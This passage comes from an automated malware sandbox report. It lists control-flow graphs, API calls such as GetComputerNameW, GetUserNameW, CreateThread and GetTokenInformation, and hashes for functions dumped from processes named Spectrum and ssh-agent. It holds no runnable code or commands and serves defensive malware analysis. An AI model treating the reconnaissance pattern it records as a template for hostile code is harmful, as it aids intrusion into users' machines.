                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 540080-540286 2 54028c 0->2 3 540099-540575 0->3 4 540445 2->4 7 540155 3->7 8 54057b 3->8 4->3 6 54044b-540457 4->6 10 540458-540472 GetComputerNameW 6->10 9 5402ef-540495 call 52e050 * 2 7->9 8->7 11 540581-540587 8->11 9->10 53 54043e 9->53 15 54024c-540253 10->15 16 5403ee-5403f4 10->16 13 54058b 11->13 18 540181 VirtualFree 13->18 19 54058c-540591 13->19 20 540255 15->20 21 5401e6 15->21 40 5400da-54023f 16->40 41 5403fa 16->41 23 5401a8-5402ac call 557164 18->23 24 540597 19->24 25 5404ab-5404af 19->25 27 5402d3 20->27 30 5402b1-5402be 21->30 31 5401ec-540313 call 55715c 21->31 23->30 24->25 26 54059d 24->26 43 5404c7 25->43 26->25 27->21 39 5402d9 27->39 36 5402c4 30->36 37 5403bf-5403d9 GetUserNameW 30->37 50 540318-54031e 31->50 36->37 45 5402ca 36->45 46 540331 37->46 39->9 40->15 54 540241-54024a 40->54 41->40 47 540400 41->47 58 5404cc-5404e6 call 559970 GetComputerNameW 43->58 45->27 51 540337 46->51 52 540171 46->52 55 54b1ee-54b49f 47->55 56 540324 50->56 57 540568-54056b 50->57 51->52 61 54033d 51->61 59 540173 52->59 60 54013f-540146 52->60 53->4 54->15 54->30 56->57 62 54032a 56->62 57->58 69 540131 58->69 70 5404ec-540514 58->70 64 540230 59->64 60->13 65 5405d0-5405d9 61->65 62->46 64->43 68 540236-5405c2 64->68 65->55 68->43 74 5405c8-5405c9 68->74 72 540137 69->72 73 540089-54008c 69->73 70->57 72->73 75 54013d 72->75 73->23 77 540092 73->77 74->65 75->18 75->60 77->23 78 540098 77->78 78->3
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction ID: 214ace1ddad264c1954cf69d19e3ef3e3a612aa453908a0fb0cd634a24e03c58
                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 1AD1283141CB098BCB24EF58DC497EA7BE1FB90314F685A1FD946C31A4DA74D645CAC2
                                                                                                                                                                      Function 00528070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 79 528070-52817e 81 528180 79->81 82 52813d-5281a5 79->82 81->82 85 528161 81->85 89 5281a7 82->89 90 5281bd-5281ca 82->90 86 528163-528170 call 557164 85->86 92 528172 86->92 93 528186 CloseHandle 86->93 96 5280f3 90->96 97 5281d0 90->97 95 52818c-528192 92->95 93->95 99 528194 95->99 100 528115-528118 95->100 101 5280f5 96->101 102 52808c 96->102 110 5280c3 97->110 111 5281fe-528201 GetTokenInformation 97->111 99->100 108 52819a 99->108 106 5280a7 100->106 107 528119-52811a 100->107 101->102 113 528077 101->113 104 52808e-528184 102->104 104->93 104->95 107->106 112 52811c 107->112 108->82 110->111 115 5280c9 110->115 116 52820f 111->116 125 5281b7 111->125 112->116 117 5281d7-5281de call 55715c 113->117 121 5280ca-5280d8 GetTokenInformation 115->121 116->104 119 528215-52821e 116->119 123 5281e3-5281e6 117->123 119->104 131 528224 119->131 124 52810f 121->124 123->121 139 528089 123->139 128 528111 124->128 129 52812d 124->129 125->116 126 5281b9-5281bb 125->126 126->90 128->129 132 528113 128->132 134 528133-5281f0 129->134 135 5280a8 129->135 131->117 137 528226 131->137 132->100 142 5281f6 134->142 143 5280da-5280f1 134->143 136 5280aa-5280ad 135->136 136->86 140 5280b3-528203 136->140 137->117 141 528228-5282ee call 525d90 137->141 139->121 144 52808b 139->144 140->86 150 528209 140->150 154 5282f0 141->154 155 52830c-528320 call 525d90 call 52ec00 141->155 142->143 147 5281fc 142->147 143->136 144->102 147->111 154->155 157 5282f2 154->157 159 5282f7-5282fc call 525d90 155->159 170 528322 155->170 157->159 164 528302 159->164 165 528253-528265 call 541280 159->165 164->165 167 528308-52830a 164->167 173 52826b 165->173 174 528328 165->174 167->155 170->159 172 528324-528326 170->172 172->174 173->174 177 52823f-528243 173->177 178 528335 174->178 179 5282df-52832b 174->179 177->159 183 528287 178->183 184 52829b-52829d 178->184 179->178 182 52832d-528331 179->182 182->178 183->184 186 52824e-528252 183->186 186->165
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: b6ca5f02ec97878bb52d4a87904fa320af6e47dcd37845dae38d154dbc967e81
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: C7610D3450FA75CFD7698BE8B8182367EA0FFA7350F680A5AE406C21E0DF249C59C752
                                                                                                                                                                      Function 00525910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 187 525910-525968 189 525915-5259b8 call 559970 call 540df0 187->189 190 52596a 187->190 203 5259bd-5259c2 call 525d90 189->203 190->189 194 525931-53072c 190->194 197 530732-530738 194->197 198 530806-530809 194->198 201 530800 197->201 202 53073e 197->202 205 53079d-5307a6 198->205 201->198 204 5306b3-5306b7 201->204 202->201 206 530744-530774 202->206 210 5259c7-5259ce 203->210 204->205 209 5306bd 204->209 211 530791-530793 205->211 212 5307a8 205->212 213 5306d5-5306d9 206->213 214 53077a-53081c 206->214 209->205 215 5306c3-5307fe 209->215 216 5259d0 210->216 217 525a1a-525a26 call 525e10 210->217 218 5307ca-5307cc 211->218 212->211 219 5307aa 212->219 224 5306db 213->224 225 5306df 213->225 214->205 215->201 216->217 223 5259d2 216->223 237 525994-52599c 217->237 238 525a0d 217->238 219->218 229 5259d4-525a15 call 5411a0 223->229 224->225 226 5306dd 224->226 225->205 226->225 231 53c0cc 226->231 233 53c0e8-53c102 231->233 234 53c0ce-53c0d0 231->234 239 53c0d2-53c0df 233->239 241 53c104 233->241 234->239 243 525a02 237->243 244 52599e-5259f7 237->244 248 525932 238->248 249 525991 238->249 251 53c0e7 239->251 241->239 241->251 243->229 255 52597d 243->255 244->243 254 5259e4-5259ec call 5521ac 248->254 249->248 253 525993 249->253 253->237 261 525a62-525a6e 254->261 262 5259ed 254->262 255->229 257 52597f-525981 255->257 259 525983-525a38 257->259 259->237 263 525a3e call 552190 259->263 264 525a70 261->264 265 525a75-525ab3 call 541280 261->265 262->259 266 5259ee-5259ef 262->266 263->237 276 5259e0 263->276 264->265 267 525a72 264->267 279 525ab5 265->279 280 525abb-525ac9 265->280 266->259 270 5259f1 266->270 267->265 270->189 276->237 278 5259e2 276->278 278->254 279->280 282 525ab7-525ab9 279->282 281 525af2-525af5 280->281 285 525ad5 281->285 286 525adb-525adc 281->286 282->280 285->286 287 525ad7-525ad9 285->287 288 525ae2 286->288 289 525a45-525a46 286->289 287->286 288->289 290 525ae8 288->290 290->281
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 9fef74b2d6fa605f30df5ddcdd88bd5c5045b4edef9dbe4ba62fe8769f5600f5
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 56F1463071CF594FC669972C685A2BA7FD2FBCA314F58459AE04AC32D6DD249C46C382
                                                                                                                                                                      Function 00525B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 333 525b42-525b47 call 525d90 335 525b4c-525b52 333->335 337 525c42-525c62 call 541280 335->337 338 525b0d 335->338 355 525c26 337->355 356 525c14-525cc0 337->356 338->337 339 525b13 338->339 341 525c8f-525c96 339->341 343 525c98-525c9a 341->343 344 525c29 341->344 345 525c9c 343->345 346 525cc2-525cc9 call 5252a0 344->346 347 525c2f-525c36 344->347 353 525bfa 345->353 354 525d0e-525d18 345->354 363 525ccb 346->363 364 525c69 346->364 347->346 352 525c3c 347->352 352->333 353->354 358 525c00 353->358 359 525d54 354->359 360 525d1a 354->360 355->356 362 525c28 355->362 356->346 358->356 367 525d4b-525d52 360->367 362->344 363->345 368 525ccd 363->368 365 525b68-525d75 364->365 366 525c6f 364->366 366->365 369 525c75 366->369 367->359 370 525d45-525d47 367->370 368->345 371 525ccf-525ce4 CreateThread 368->371 369->341 373 525d49 370->373 374 525d5f 370->374 376 525c01-525c05 371->376 377 525cea 371->377 373->367 373->374 379 525d65 374->379 381 525c20-525c68 376->381 384 525d37-525d41 376->384 377->376 378 525cf0-525cf6 377->378 378->381 379->379 384->367 385 525d43 384->385 385->359
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: d49ff784e9a27906dac7de33df3fd33538e6e3826bd86f4445e3696d44613eab
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: A221D33020CF658FCB6A9718B4887742ED1BF57321F6809A69047DF1D6FA34CD489711
                                                                                                                                                                      Function 00525B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 386 525b09-525d01 391 525d07 386->391 392 525bb4-525ce4 CreateThread 386->392 391->392 394 525d0d 391->394 397 525c01-525c05 392->397 398 525cea 392->398 395 525d37-525d41 394->395 399 525d43 395->399 400 525d4b-525d52 395->400 397->395 405 525c20-525c68 397->405 398->397 401 525cf0-525cf6 398->401 402 525d54 399->402 400->402 403 525d45-525d47 400->403 401->405 406 525d49 403->406 407 525d5f 403->407 406->400 406->407 410 525d65 407->410 410->410
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: 0c23bd7930113c9058c7f677152db281cdb8a3d62256f3f5166fd4a16a9553f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: A801803010DF668FDB565624BC193796F90BF53324F6509AB8487DA0D5FA744E04AB12
                                                                                                                                                                      Function 00525B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 411 525b87-525b99 CreateThread 412 525cff-525d01 411->412 413 525b1c-525b3b 411->413 414 525d07 412->414 415 525bb4-525ce4 CreateThread 412->415 413->412 414->415 418 525d0d 414->418 421 525c01-525c05 415->421 422 525cea 415->422 419 525d37-525d41 418->419 423 525d43 419->423 424 525d4b-525d52 419->424 421->419 429 525c20-525c68 421->429 422->421 425 525cf0-525cf6 422->425 426 525d54 423->426 424->426 427 525d45-525d47 424->427 425->429 430 525d49 427->430 431 525d5f 427->431 430->424 430->431 434 525d65 431->434 434->434
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: ffd33f2b362b5ea4308fb9a0ee530e3bcd425b72b1802e46fc75f5c3726f9b27
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: F5E0863060DB544FDB599B2468203193EE5FF8A310F1545CFC44BDB1D1EB790D064782
                                                                                                                                                                      Function 0052599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 435 52599b-52599e 436 5259f7 435->436 437 5259b8 call 540df0 435->437 439 525a02 436->439 440 5259bd-5259c2 call 525d90 437->440 443 5259d4-525a15 call 5411a0 439->443 444 52597d 439->444 446 5259c7-5259ce 440->446 444->443 447 52597f-525981 444->447 449 5259d0 446->449 450 525a1a-525a26 call 525e10 446->450 451 525983-525a38 447->451 449->450 455 5259d2 449->455 456 525994-52599c 450->456 465 525a0d 450->465 451->456 457 525a3e call 552190 451->457 455->443 456->439 460 52599e 456->460 457->456 471 5259e0 457->471 460->436 469 525932 465->469 470 525991 465->470 474 5259e4-5259ec call 5521ac 469->474 470->469 472 525993 470->472 471->456 473 5259e2 471->473 472->456 473->474 477 525a62-525a6e 474->477 478 5259ed 474->478 479 525a70 477->479 480 525a75-525ab3 call 541280 477->480 478->451 481 5259ee-5259ef 478->481 479->480 482 525a72 479->482 491 525ab5 480->491 492 525abb-525ac9 480->492 481->451 484 5259f1 call 559970 481->484 482->480 484->437 491->492 494 525ab7-525ab9 491->494 493 525af2-525af5 492->493 497 525ad5 493->497 498 525adb-525adc 493->498 494->492 497->498 499 525ad7-525ad9 497->499 500 525ae2 498->500 501 525a45-525a46 498->501 499->498 500->501 502 525ae8 500->502 502->493
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 92b4fc71c567c351ca86156f3356b7e9d51313220636477fce29801361cc4a8b
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction Fuzzy Hash: 4201267090EEB0CFD61AA728744A2792D51BF97335F684956904BC70D2FA344D84D341
                                                                                                                                                                      Function 00528090 Relevance: 1.3, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 503 528090-528096 504 528184 503->504 505 52813c-5281a5 503->505 506 528186 CloseHandle 504->506 507 52818c-528192 504->507 518 5281a7 505->518 519 5281bd-5281ca 505->519 506->507 509 528194 507->509 510 528115-528118 507->510 509->510 513 52819a 509->513 511 5280a7 510->511 512 528119-52811a 510->512 512->511 515 52811c 512->515 513->505 517 52820f 515->517 520 528215-52821e 517->520 521 52808e-528096 517->521 524 5280f3 519->524 525 5281d0 519->525 520->521 526 528224 520->526 521->504 528 5280f5 524->528 529 52808c 524->529 535 5280c3 525->535 536 5281fe-528201 GetTokenInformation 525->536 532 528226 526->532 533 5281d7-5281e6 call 55715c 526->533 528->529 538 528077 528->538 529->521 532->533 534 528228-5282ee call 525d90 532->534 544 5280ca-52810f GetTokenInformation 533->544 555 528089 533->555 559 5282f0 534->559 560 52830c-528320 call 525d90 call 52ec00 534->560 535->536 540 5280c9 535->540 536->517 550 5281b7 536->550 538->533 540->544 552 528111 544->552 553 52812d 544->553 550->517 551 5281b9-5281bb 550->551 551->519 552->553 556 528113 552->556 557 528133-5281f0 553->557 558 5280a8 553->558 555->544 561 52808b 555->561 556->510 569 5281f6 557->569 570 5280da-5280f1 557->570 562 5280aa-5280ad 558->562 559->560 565 5282f2 559->565 571 5282f7-5282fc call 525d90 560->571 590 528322 560->590 561->529 567 528163-528170 call 557164 562->567 568 5280b3-528203 562->568 565->571 567->506 584 528172 567->584 568->567 581 528209 568->581 569->570 575 5281fc 569->575 570->562 582 528302 571->582 583 528253-528265 call 541280 571->583 575->536 582->583 586 528308-52830a 582->586 593 52826b 583->593 594 528328 583->594 584->507 586->560 590->571 592 528324-528326 590->592 592->594 593->594 597 52823f-528243 593->597 598 528335 594->598 599 5282df-52832b 594->599 597->571 603 528287 598->603 604 52829b-52829d 598->604 599->598 602 52832d-528331 599->602 602->598 603->604 606 52824e-528252 603->606 606->583
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: 0aa43e0b38f585036a98d3f5509dbd66da53ccf1a6ef7ab425d7f83b7ae6d616
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: 02C08C6052B83696B23802CC3C0B0B02E40BE03351B0C08068C02C02E0DD049E73C09B
                                                                                                                                                                      Function 0052817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 607 52817f 608 528184 607->608 609 528186 CloseHandle 608->609 610 52818c-528192 608->610 609->610 611 528194 610->611 612 528115-528118 610->612 611->612 615 52819a-5281a5 611->615 613 5280a7 612->613 614 528119-52811a 612->614 614->613 616 52811c 614->616 626 5281a7 615->626 627 5281bd-5281ca 615->627 618 52820f 616->618 620 528215-52821e 618->620 621 52808e-528096 618->621 620->621 625 528224 620->625 621->608 628 528226 625->628 629 5281d7-5281e6 call 55715c 625->629 633 5280f3 627->633 634 5281d0 627->634 628->629 631 528228-5282ee call 525d90 628->631 650 5280ca-52810f GetTokenInformation 629->650 651 528089 629->651 655 5282f0 631->655 656 52830c-528320 call 525d90 call 52ec00 631->656 640 5280f5 633->640 641 52808c 633->641 646 5280c3 634->646 647 5281fe-528201 GetTokenInformation 634->647 640->641 648 528077 640->648 641->621 646->647 652 5280c9 646->652 647->618 668 5281b7 647->668 648->629 658 528111 650->658 659 52812d 650->659 651->650 657 52808b 651->657 652->650 655->656 662 5282f2 655->662 667 5282f7-5282fc call 525d90 656->667 693 528322 656->693 657->641 658->659 663 528113 658->663 665 528133-5281f0 659->665 666 5280a8 659->666 662->667 663->612 678 5281f6 665->678 679 5280da-5280f1 665->679 670 5280aa-5280ad 666->670 680 528302 667->680 681 528253-528265 call 541280 667->681 668->618 669 5281b9-5281bb 668->669 669->627 675 528163-528170 call 557164 670->675 676 5280b3-528203 670->676 675->609 692 528172 675->692 676->675 691 528209 676->691 678->679 685 5281fc 678->685 679->670 680->681 686 528308-52830a 680->686 696 52826b 681->696 697 528328 681->697 685->647 686->656 692->610 693->667 695 528324-528326 693->695 695->697 696->697 701 52823f-528243 696->701 702 528335 697->702 703 5282df-52832b 697->703 701->667 707 528287 702->707 708 52829b-52829d 702->708 703->702 706 52832d-528331 703->706 706->702 707->708 710 52824e-528252 707->710 710->681
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001B.00000002.2615183440.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_27_2_520000_Spectrum.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 0d2e0dd12c0039f12841cb981487d7cc118ab6e8cf56cf9362d55b7ca9d5620b
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 51C092A095B53987B13827CC3C0A0B13D947E13761F0C4812ED069A3E0DD586DB3C5A2

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 004E52A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 292 4e52a0-4e52a5 293 4e532e-4e533f 292->293 294 4e52ab-4e52f5 292->294 299 4e536b-4e5390 293->299 294->293 297 4e52f7 294->297 298 4e53fe 297->298 300 4e5404-4e540e 298->300 301 520d4c-520d4e 298->301 307 4e5392-4e539a 299->307 308 4e53c3 299->308 303 4e5424 300->303 305 4e542a 303->305 306 4e539b 303->306 305->306 309 4e5430-4e5443 305->309 310 4e539d-4e53a1 306->310 311 4e5413-4e5419 306->311 307->306 312 4e53a7 310->312 313 4e52b0-4e52b5 310->313 312->313 314 4e53ad 312->314 315 4e53af-4e53f1 314->315 316 4e53f3-4e53f9 314->316 315->311 315->316 316->298 319 4e5322-4e5328 316->319 320 4e532a 319->320 321 4e5355 319->321 320->321 323 4e532c 320->323 324 4e52e8-4e5363 321->324 325 4e52d1-4e52e7 321->325 323->293 328 4e5365 324->328 329 4e53d1-4e53d5 324->329 325->324 328->329 331 4e5367-4e5369 328->331 329->310 330 4e53d7 329->330 333 4e534b 330->333 334 4e5400-4e540e 330->334 331->299 333->334 335 4e5351-4e5353 333->335 334->303 335->321
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 004E53C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 0ad6aec421669d743c0388162e9b3ac439f23b7ecbc3b44edf9c98a5bbea0f4f
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F41056180DED58FD326422754243B27BA0AB123EFF9D05D7D982CB2E2D19C0C82972F
                                                                                                                                                                      Function 00500080 Relevance: 5.0, APIs: 3, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 500080-500286 2 500099-500575 0->2 3 50028c 0->3 6 500155 2->6 7 50057b 2->7 5 500445 3->5 5->2 8 50044b-500457 5->8 11 5002ef-500495 call 4ee050 * 2 6->11 7->6 10 500581-500587 7->10 9 500458-500472 GetComputerNameW 8->9 18 50024c-500253 9->18 19 5003ee-5003f4 9->19 13 50058b 10->13 11->9 55 50043e 11->55 16 500181 VirtualFree 13->16 17 50058c-500591 13->17 25 5001a8-5002ac call 517164 16->25 20 500597 17->20 21 5004ab-5004af 17->21 22 500255 18->22 23 5001e6 18->23 35 5000da-50023f 19->35 36 5003fa 19->36 20->21 27 50059d 20->27 46 5004c7 21->46 28 5002d3 22->28 31 5002b1-5002be 23->31 32 5001ec-500313 call 51715c 23->32 25->31 27->21 28->23 34 5002d9 28->34 41 5002c4 31->41 42 5003bf-5003d9 GetUserNameW 31->42 52 500318-50031e 32->52 34->11 35->18 50 500241-50024a 35->50 36->35 43 500400 36->43 41->42 48 5002ca 41->48 49 500331 42->49 51 50b1ee-50b49f 43->51 58 5004cc-5004e6 call 519970 GetComputerNameW 46->58 48->28 53 500171 49->53 54 500337 49->54 50->18 50->31 56 500324 52->56 57 500568-50056b 52->57 59 500173 53->59 60 50013f-500146 53->60 54->53 61 50033d 54->61 55->5 56->57 63 50032a 56->63 57->58 70 500131 58->70 71 5004ec-500514 58->71 65 500230 59->65 60->13 66 5005d0-5005d9 61->66 63->49 65->46 67 500236-5005c2 65->67 66->51 67->46 74 5005c8-5005c9 67->74 72 500137 70->72 73 500089-50008c 70->73 71->57 72->73 76 50013d 72->76 73->25 75 500092 73->75 74->66 75->25 78 500098 75->78 76->16 76->60 78->2
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000001C.00000002.2618536290.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_28_2_4e0000_ssh-agent.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ComputerName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3545744682-0
                                                                                                                                                                      • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction ID: 5829d541d9fd36e1748333dfecd972fc4a2850cfc17f964588f9e90c7016710d
